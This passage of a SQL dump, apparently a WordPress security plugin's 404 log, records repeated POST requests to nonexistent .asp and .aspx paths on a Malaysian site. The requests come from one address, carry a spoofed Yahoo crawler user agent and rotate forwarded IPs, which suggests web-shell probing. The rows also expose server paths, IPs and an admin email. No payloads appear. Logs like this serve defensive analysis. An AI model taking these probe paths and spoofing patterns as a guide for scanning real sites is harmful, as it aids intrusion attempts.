http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"116.216.109.252\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"116.216.109.252\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/kh/flash.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/kh/flash.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatfnfVzlVwlNsD8qm@33AAAAMM\";s:12:\"REDIRECT_URL\";s:13:\"/kh/flash.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64183\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/kh/flash.asp\";s:10:\"SCRIPT_URL\";s:13:\"/kh/flash.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatfnfVzlVwlNsD8qm@33AAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512221.6973\";s:12:\"REQUEST_TIME\";s:10:\"1571512221\";}}','notice','2019-10-19 19:10:24','2019-10-19 19:10:22',35337352,37145024,'http://bintara.com.my//kh/flash.asp',1,0,'116.216.109.252'),(28447,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//kh/flash.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.108.43.131\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.108.43.131\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/kh/flash.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/kh/flash.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatfqvVzlVwlNsD8qm@34QAAAMk\";s:12:\"REDIRECT_URL\";s:13:\"/kh/flash.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64183\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/kh/flash.asp\";s:10:\"SCRIPT_URL\";s:13:\"/kh/flash.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatfqvVzlVwlNsD8qm@34QAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512234.2258\";s:12:\"REQUEST_TIME\";s:10:\"1571512234\";}}','notice','2019-10-19 19:10:35','2019-10-19 19:10:34',35263080,37065496,'http://bintara.com.my//kh/flash.asp',1,0,'124.108.43.131'),(28448,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//css/qiao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"122.48.96.76\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"122.48.96.76\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/css/qiao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/css/qiao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatf4I7-RFqMeLUZjgueygAAAJE\";s:12:\"REDIRECT_URL\";s:13:\"/css/qiao.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64153\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/css/qiao.asp\";s:10:\"SCRIPT_URL\";s:13:\"/css/qiao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatf4I7-RFqMeLUZjgueygAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512289.0534\";s:12:\"REQUEST_TIME\";s:10:\"1571512289\";}}','notice','2019-10-19 19:11:31','2019-10-19 19:11:29',35737272,37550280,'http://bintara.com.my//css/qiao.asp',1,0,'122.48.96.76'),(28449,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//css/aux.x.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.20.189.225\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.20.189.225\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/css/aux.x.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/css/aux.x.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatf8I7-RFqMeLUZjgueywAAAIA\";s:12:\"REDIRECT_URL\";s:14:\"/css/aux.x.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/css/aux.x.asp\";s:10:\"SCRIPT_URL\";s:14:\"/css/aux.x.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatf8I7-RFqMeLUZjgueywAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512304.2532\";s:12:\"REQUEST_TIME\";s:10:\"1571512304\";}}','notice','2019-10-19 19:11:46','2019-10-19 19:11:44',35339952,37136152,'http://bintara.com.my//css/aux.x.asp',1,0,'124.20.189.225'),(28450,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//css/aux.x.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"123.145.249.133\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"123.145.249.133\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/css/aux.x.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/css/aux.x.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatf-4q@uz@DI827WH6weQAAAVQ\";s:12:\"REDIRECT_URL\";s:14:\"/css/aux.x.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/css/aux.x.asp\";s:10:\"SCRIPT_URL\";s:14:\"/css/aux.x.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatf-4q@uz@DI827WH6weQAAAVQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512320.0509\";s:12:\"REQUEST_TIME\";s:10:\"1571512320\";}}','notice','2019-10-19 19:12:02','2019-10-19 19:12:00',35268880,37073328,'http://bintara.com.my//css/aux.x.asp',1,0,'123.145.249.133'),(28451,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//data/guowai.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"123.127.10.19\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"123.127.10.19\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgE7VvTBqXFHRB7z80IAAAAAs\";s:12:\"REDIRECT_URL\";s:16:\"/data/guowai.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63145\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:10:\"SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgE7VvTBqXFHRB7z80IAAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512339.7692\";s:12:\"REQUEST_TIME\";s:10:\"1571512339\";}}','notice','2019-10-19 19:12:21','2019-10-19 19:12:20',35263280,37062640,'http://bintara.com.my//data/guowai.asp',1,0,'123.127.10.19'),(28452,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//shanjia.aSpX\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"221.230.4.137\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"221.230.4.137\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgJvVzlVwlNsD8qm@3-AAAANc\";s:12:\"REDIRECT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63640\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:10:\"SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgJvVzlVwlNsD8qm@3-AAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512358.4871\";s:12:\"REQUEST_TIME\";s:10:\"1571512358\";}}','notice','2019-10-19 19:12:40','2019-10-19 19:12:38',35262904,37059456,'http://bintara.com.my//shanjia.aSpX',1,0,'221.230.4.137'),(28453,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//shanjia.aSpX\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"202.164.9.2\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"202.164.9.2\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgNIq@uz@DI827WH6wewAAAVE\";s:12:\"REDIRECT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63944\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:10:\"SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgNIq@uz@DI827WH6wewAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512372.4835\";s:12:\"REQUEST_TIME\";s:10:\"1571512372\";}}','notice','2019-10-19 19:12:54','2019-10-19 19:12:53',35336920,37143104,'http://bintara.com.my//shanjia.aSpX',1,0,'202.164.9.2'),(28454,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//shanjia.aSpX\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.246.246.169\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.246.246.169\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgTI7-RFqMeLUZjgue1QAAAIs\";s:12:\"REDIRECT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63239\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/shanjia.aSpX\";s:10:\"SCRIPT_URL\";s:13:\"/shanjia.aSpX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgTI7-RFqMeLUZjgue1QAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512396.1174\";s:12:\"REQUEST_TIME\";s:10:\"1571512396\";}}','notice','2019-10-19 19:13:17','2019-10-19 19:13:16',35268040,37075008,'http://bintara.com.my//shanjia.aSpX',1,0,'218.246.246.169'),(28455,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//feg/pabi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 